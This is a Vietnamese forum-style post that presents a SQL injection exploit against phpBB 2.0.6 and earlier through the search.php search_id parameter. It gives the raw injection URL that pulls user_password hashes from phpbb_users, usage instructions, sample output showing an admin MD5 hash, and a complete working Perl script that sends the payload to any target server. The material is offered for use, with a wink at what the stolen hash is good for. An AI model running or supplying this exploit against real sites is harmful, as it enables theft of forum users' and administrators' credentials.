Mô tả : bây giờ chúng ta sẽ dựa
vào lỗi này để lấy MD5 Hash password :
/search.php?search_id=search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,
99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,
116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,
34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,
95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,
115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,
59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users
%20where%20user_id=user_id/*
Trong đó : search_id = id của user muốn lấy pass .
Bây chúng ta sẽ có sẵn một Script chạy sẵn để lấy Hash MD5 với bất cứ 1 id nào
do nhóm RusH security team viết :
Cách sử dụng :
security-com-vn.pl <server> <folder> <user_id> <search_id>
<server> - Địa chỉ IP hoặc URL - vi dụ : www.security.com.vn
<folder> - Thư mục chứa Forum - Ví dụ : phpBB
<user_id> - Id của user - Ví dụ : 2 mặc định của Admin trong phpBB
<search_id> - 1 ,2 ,3 ,4 tuỳ thế nào cũng được cái Value để gây ra SQL
injection ấy mùn ;)
* Chỉ làm việc với MSQL > 4.0
* Mỗi lần làm việc chỉ lấy được 1 PASS MD5 HASH
Ví dụ :
C:\security-com-vn.pl www.security.com.vn phpBB 2 2
[~] Chuan bi ket noi ...
[+] Da ket noi
[~] Chuan bi gui yeu cau ...
[+] OK
[~] Cho nhan du lieu...
[+] MD5 Hash cua user id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99 <=== Pass MD5
nè , biết để làm gì với cái này không đó :D
Code :
#!/usr/bin/perl -w
use IO::Socket;
if (@ARGV < 4)
{
print "\n\n";
print "|****************************************************************|\n";
print " security-com-vn.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by VietNam security team // http://www.security.com.vn/ \n";
print " Usage: security-com-vn.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: security-com-vn.pl www.security.com.vn phpBB 2 2\n";
print " [~] <server> - Địa chỉ IP hoặc URL - vi dụ :
http://www.security.com.vn/\n";
print " [~] <folder> - Thư mục chứa Forum - Ví dụ : phpBB\n";
print " [~] <user_id> - Id của user - Ví dụ : 2 mặc định của Admin trong
phpBB\n";
print " [~] <search_id> - 1 ,2 ,3 ,4 tuỳ thế nào cũng được cái Value để gây ra
SQL injection ấy mùn ;)s\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT reguest...
print $socket "GET
/$folder/search.php?search_id=$search_id%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,
101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,
108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,
97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,
115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,
68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,
112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))
%20from%20phpbb_users%20where%20user_id=$user_id/*
HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";
}